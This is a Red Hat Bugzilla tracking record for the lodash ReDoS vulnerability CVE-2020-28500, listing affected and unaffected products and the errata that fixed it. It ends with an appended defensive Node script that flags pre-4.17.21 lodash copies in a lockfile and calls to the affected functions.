Bug 1928954 (CVE-2020-28500)
| Field | Value | Field | Value |
|---|---|---|---|
| Summary | CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions | | |
| Product | [Other] Security Response | Reporter | Guilherme de Almeida Suckevicz <gsuckevi> |
| Component | vulnerability | Assignee | Red Hat Product Security <security-response-team> |
| Status | CLOSED NOTABUG | QA Contact | |
| Severity | medium | Docs Contact | |
| Priority | medium | | |
| Version | unspecified | CC | alazarot, alegrand, anpicker, anstephe, aos-bugs, aturgema, bdettelb, bmontgom, chousekn, cmeyers, davidn, dfediuck, dwhatley, dymurray, eedri, emingora, eparis, erooth, etirelli, extras-orphan, gblomqui, gghezzo, gparvin, ibek, ibolton, ikarpukh, jburrell, jcantril, jcosta, jhadvig, jhardy, jmatthew, jmontleo, jokerman, jramanat, jrokos, jshaughn, jstastny, jweiser, jwendell, kakkoyun, kconner, krathod, kverlaen, lcosic, mabashia, mgoldboi, michal.skrivanek, mnovotny, nodejs-sig, notting, nstielau, osapryki, pjindal, pkrupa, rcernich, rguimara, rpetrell, rrajasek, sbonazzo, sd-operator-metering, sgratch, sherold, slucidi, smcdonal, sponnaga, sseago, stcannon, surbania, swshanka, tflannag, thee, tomckay, twalsh, tzimanyi |
| Target Milestone | --- | Keywords | Security |
| Target Release | --- | | |
| Hardware | All | | |
| OS | Linux | | |
| Whiteboard | | | |
| Fixed In Version | nodejs-lodash-4.17.21 | Doc Type | If docs needed, set a value |
| Doc Text | A flaw was found in nodejs-lodash. A Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions is possible. | | |
| Story Points | --- | | |
| Clone Of | | Environment | |
| Last Closed | 2021-04-13 06:39:06 UTC | Type | --- |
| Regression | --- | Mount Type | --- |
| Documentation | --- | CRM | |
| Verified Versions | | Category | --- |
| oVirt Team | --- | RHEL 7.3 requirements from Atomic Host | |
| Cloudforms Team | --- | Target Upstream Version | |
| Embargoed | | | |
| Bug Depends On | 1928955, 1928956, 1929027, 1929028, 1929029, 1930135, 1930136, 1930137, 1930154, 1930155, 1930156, 1930157, 1930158, 1930159, 1930160, 1931277, 1931278, 1931279, 1931280, 1931281, 1931282, 1937751, 1937752, 1937753, 1937955, 1938267, 1938268, 1938269, 2110862 | | |
| Bug Blocks | 1928940 | | |
Description
Guilherme de Almeida Suckevicz
2021-02-15 20:53:24 UTC
Created lodash tracking bugs for this issue:

Affects: fedora-32 [bug 1928955]

Created nodejs-lodash tracking bugs for this issue:

Affects: epel-all [bug 1928956]

While Red Hat Quay has a dependency on lodash via restangular it doesn't use the vulnerable toNumber, trim, or trimEnd functions.

Upstream fix: https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7 [not merged as of yet]

Statement: In OpenShift ServiceMesh (OSSM) and Red Hat OpenShift Jaeger (RHOSJ) the affected containers are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-lodash library to authenticated users only, therefore the impact is low.

While Red Hat Virtualization's cockpit-ovirt has a dependency on lodash it doesn't use the vulnerable toNumber, trim, or trimEnd functions.

Did the code review again and found that, though it uses lodash, it does not use the vulnerable functions which cause the ReDoS. Hence, marking it as "Not Affected".

This issue has been addressed in the following products:

Red Hat Advanced Cluster Management for Kubernetes 2.2 for RHEL 8
Red Hat Advanced Cluster Management for Kubernetes 2.2 for RHEL 7

Via RHSA-2021:1168 https://access.redhat.com/errata/RHSA-2021:1168

This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2020-28500

This issue has been addressed in the following products:

Red Hat Virtualization Engine 4.4

Via RHSA-2021:2179 https://access.redhat.com/errata/RHSA-2021:2179

This issue has been addressed in the following products:

Red Hat OpenShift Jaeger 1.20

Via RHSA-2021:2543 https://access.redhat.com/errata/RHSA-2021:2543

This issue has been addressed in the following products:

Red Hat OpenShift Container Platform 4.8

Via RHSA-2021:2438 https://access.redhat.com/errata/RHSA-2021:2438

Updated the public date per @btarasso. The public date was incorrectly pointing to the date when the vulnerability was disclosed to Snyk, not when it was fixed.

This issue has been addressed in the following products:

Red Hat Advanced Cluster Management for Kubernetes 2.3 for RHEL 7
Red Hat Advanced Cluster Management for Kubernetes 2.3 for RHEL 8

Via RHSA-2021:3016 https://access.redhat.com/errata/RHSA-2021:3016

This issue has been addressed in the following products:

Red Hat Virtualization 4 for Red Hat Enterprise Linux 8

Via RHSA-2021:3459 https://access.redhat.com/errata/RHSA-2021:3459

This issue has been addressed in the following products:

Red Hat Migration Toolkit for Containers 1.7

Via RHSA-2022:6429 https://access.redhat.com/errata/RHSA-2022:6429
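As an added example that is not part of this bug record and not lodash's own code, the following Node script does the triage that the product statements in this bug describe: it checks a package-lock.json for any lodash copy older than the fixed release 4.17.21 (the "Fixed In Version" above) and scans application source for calls to the affected toNumber, trim and trimEnd functions. The lockfile, the source snippet and the package names inside them are constructed for the demo; the import spellings it recognises are an assumption about typical usage, not an exhaustive list.

```javascript
// Added example (not from the Bugzilla record or from lodash): triage helper for
// CVE-2020-28500. It answers the two questions the product statements turn on:
//   1. Does a package-lock.json pin any lodash copy older than the fixed 4.17.21?
//   2. Does the application's own source call toNumber, trim or trimEnd at all?
// Node built-ins only. All sample inputs below are constructed for the demo.

const FIXED_VERSION = '4.17.21';                      // "Fixed In Version" from the bug
const AFFECTED_FUNCTIONS = ['toNumber', 'trim', 'trimEnd'];

// Compare dotted numeric versions; returns -1, 0 or 1. Any pre-release suffix is
// dropped (assumption: the lockfile pins plain release versions).
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Collect every lodash version pinned anywhere in a package-lock.json, nested
// copies included, for both the lockfileVersion 1 layout ("dependencies" tree)
// and the lockfileVersion 2/3 layout ("packages" keyed by node_modules path).
function lodashVersionsInLock(lock) {
  const found = new Set();
  const walk = (deps) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      if (name === 'lodash' && meta.version) found.add(meta.version);
      walk(meta.dependencies);
    }
  };
  walk(lock.dependencies);
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (/(^|\/)node_modules\/lodash$/.test(path) && meta.version) found.add(meta.version);
  }
  return [...found].sort();
}

// Versions in the lockfile that predate the fix.
function vulnerableLodashVersions(lock) {
  return lodashVersionsInLock(lock).filter((v) => compareVersions(v, FIXED_VERSION) < 0);
}

// Report call sites of the affected functions in one JS source string. Recognised
// spellings: `_.trim(` / `lodash.trim(`, the per-function modules 'lodash/trim' and
// 'lodash.trim', and a bare `trim(` only when the file imports that name from
// lodash (so String.prototype.trim on its own is not flagged).
function affectedCallSites(source) {
  const hits = [];
  const imported = new Set();
  const namedImport =
    /(?:import\s*\{([^}]*)\}\s*from\s*|const\s*\{([^}]*)\}\s*=\s*require\()\s*['"]lodash['"]/g;
  for (const m of source.matchAll(namedImport)) {
    for (const name of (m[1] || m[2]).split(',')) {
      if (AFFECTED_FUNCTIONS.includes(name.trim())) imported.add(name.trim());
    }
  }
  source.split('\n').forEach((line, idx) => {
    for (const fn of AFFECTED_FUNCTIONS) {
      const member = new RegExp(`\\b(?:_|lodash)\\.${fn}\\s*\\(`);
      const perFnModule = new RegExp(`['"]lodash[./]${fn}['"]`);
      const bare = new RegExp(`(?<![.\\w$])${fn}\\s*\\(`);
      if (member.test(line) || perFnModule.test(line) || (imported.has(fn) && bare.test(line))) {
        hits.push({ line: idx + 1, fn });
      }
    }
  });
  return hits;
}

// Same reasoning as the product statements in the bug: exposure needs both an
// unfixed copy in the dependency tree and a reachable call to an affected function.
function triage(lock, source) {
  const vulnerableVersions = vulnerableLodashVersions(lock);
  const affectedCalls = affectedCallSites(source);
  return { vulnerableVersions, affectedCalls, exposed: vulnerableVersions.length > 0 && affectedCalls.length > 0 };
}

// Constructed lockfile: a fixed top-level lodash plus an unfixed nested copy.
const sampleLock = {
  lockfileVersion: 2,
  packages: {
    'node_modules/lodash': { version: '4.17.21' },
    'node_modules/some-ui-lib/node_modules/lodash': { version: '4.17.15' },
  },
  dependencies: {
    lodash: { version: '4.17.21' },
    'some-ui-lib': { version: '1.0.0', dependencies: { lodash: { version: '4.17.15' } } },
  },
};

// Constructed source: three affected call sites, one harmless String.prototype.trim.
const sampleSource = [
  "import { trim, debounce } from 'lodash';",
  "const _ = require('lodash');",
  "const toNumber = require('lodash/toNumber');",
  'function clean(s) { return trim(s); }',
  'function strip(s) { return s.trim(); }',
  'const n = _.trimEnd(input);',
  'const d = _.debounce(fn, 100);',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triage(sampleLock, sampleSource), null, 2));
}
```

The nested-copy case is the one the Quay and cockpit-ovirt statements above hinge on: an unfixed lodash pulled in by a dependency is only reachable through whatever that dependency itself calls, and a scan of the application's own files will not see those calls. Treat any vulnerable version the lockfile walk reports as needing either an upgrade or the same source scan run over that dependency's code.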